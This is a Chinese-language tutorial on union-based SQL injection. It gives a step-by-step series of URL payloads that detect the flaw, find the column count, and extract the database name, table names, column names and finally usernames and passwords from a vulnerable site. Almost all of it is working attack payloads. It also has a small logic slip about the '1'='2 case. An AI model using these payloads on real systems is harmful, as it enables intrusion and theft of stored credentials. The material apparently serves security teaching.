SQL注入之联合查询

一、判断是否存在SQL注入

最为经典的单引号判断法：
在参数后面加上单引号,比如: http://xxx/abc.php?id=1' 如果页面返回错误，则存在 Sql 注入。
原因是无论字符型还是整型都会因为单引号个数不匹配（未闭合）而报错。
（如果未报错，不代表不存在 Sql 注入，因为有可能页面对单引号做了过滤，这时可以使用判断语句进行注入...待完善）

二、判断SQL注入漏洞的类型

1.数字型判断

Url 地址中输入 http://xxx/abc.php?id=1 and 1=1 页面依旧运行正常，继续进行下一步。

Url 地址中输入 http://xxx/abc.php?id=1 and 1=2 页面运行错误，则说明此 Sql 注入为数字型注入。

说明：当输入 and 1=1时，后台执行 Sql 语句：select * from <表名> where id = 1 and 1=1 没有语法错误且逻辑判断为正确，所以返回正常。
           当输入 and 1=2时，后台执行 Sql 语句：select * from <表名> where id = 1 and 1=2 没有语法错误但是逻辑判断为假，所以返回错误。
2.字符型判断

Url 地址中输入 http://xxx/abc.php?id= 1' and '1'='1 页面运行正常，继续进行下一步。

Url 地址中输入 http://xxx/abc.php?id= 1' and '1'='2 页面运行错误，则说明此 Sql 注入为字符型注入。

说明：当输入 and ‘1’='1时，后台执行 Sql 语句：select * from <表名> where id = '1' and '1'='1'语法正确，逻辑判断正确，所以返回正确。
           当输入 and ‘1’='2时，后台执行 Sql 语句：select * from <表名> where id = '1' and '1'='2'语法正确，但逻辑判断错误，所以返回正确。同学们同样可以使用假设法来验证。

三、进行拼串，确定查询数据的列数（字段数）

Url 地址中输入 http://xxx/abc.php?id=1 order by 100-- -(采用二分查找法，确定列数)

四、在已知的列数/字段判断可显示位

Url 地址中输入 http://xxx/abc.php?id=-1 union select 1,2,3,4-- -(假设确定的列数为4)

五、在“显示位”显示“数据库”名

Url 地址中输入 http://xxx/abc.php?id=-1 union select 1,2,database(),4-- -

六、在“显示位”显示“表”名

Url 地址中输入 http://xxx/abc.php?id=-1' union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()-- -

七、在“显示位”显示“字段”名

Url 地址中输入 http://xxx/abc.php?id=-1' union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name="表名"-- -

八、在“显示位”显示“账号、密码”

Url 地址中输入 http://xxx/abc.php?id=-1' union select 1,group_concat(name),group_concat(password),4 from "表名"-- -